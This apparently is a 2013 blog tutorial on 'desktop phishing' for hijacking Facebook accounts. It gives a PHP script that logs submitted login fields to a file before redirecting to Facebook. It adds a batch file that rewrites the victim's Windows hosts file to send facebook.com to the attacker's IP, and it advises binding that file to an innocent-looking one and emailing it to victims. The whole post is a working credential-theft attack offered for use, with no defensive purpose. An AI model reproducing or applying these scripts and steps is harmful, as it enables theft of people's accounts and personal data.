Wednesday, 13 November 2013

Hack a Facebook via a Desktop Phishing

Desktop Phishing - Step by step tutorial

In desktop phishing:-
1. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.
2. Victim types  the domain name of orignal/genuine website and is taken to our fake login page. But the domain name remains the same as typed by victim and victim doesn't come to know.
3. Rest of the things are same as in normal phishing.
What is Hosts File ?

The hosts file  is a text file containing domain names and IP address associated with them.
Location of hosts file in windows: C:\Windows\System32\drivers\etc\
Whenever we visit any website, say www.anything.com , an query is sent to  Domain Name Server(DNS) to  look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.

Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would
be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.

What we need ?

  1. Xampp Download Here

      2.  Phishing Script Download


<?php
header ('Location: http://www.facebook.com');
$handler = fopen("fake.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handler, $variable);
fwrite($handler, "=");
fwrite($handler, $value);
fwrite($handler, "\r\n");
}
fwrite($handler, "\r\n");
fclose($handler);
  
exit;
?>

        3. Phish Facebook Login page  Download

       4.Strong Open VPN Download It Here  

    5.Desktop Phishing Script 



    @echo off
    echo 0.1.2.3   www.facebook.com >> C:\windows\system32\drivers\etc\hosts
    exit

     Replace 0.1.2.3 in Desktop phishing script with the ip address you got
    from the vpn, to check ip address goto http://cmyip.com & save file as anything.bat
    This file could look like suspicious to the person you are sending through
    email or by data transfer medium. So we will bind it with another fileusing binder�s Google them you will find lots of binders out there.After the victim executes your .bat file his host file adds some thing like this
    & whenever he enter www.facebook .com he will be redirected to you ip address hosting phisher

      First we install XAMPP  in our system that look like  are these picture

      :::then navigate in your computer on these location
      ******C:\xampp\htdocs   in these folder delete all files
       *****paste facebook login script  and phish page files

       last at least open your Xampp control panel and start Apache and MySQL ......you done your Desktop Phishing is ready..
      now  open your browser and type 127.0.0.1 in your address bar...your phishing page is now ready to go ...for hacking fb account you simply give your ip address to your victim.

      No comments:

      Post a Comment

      Search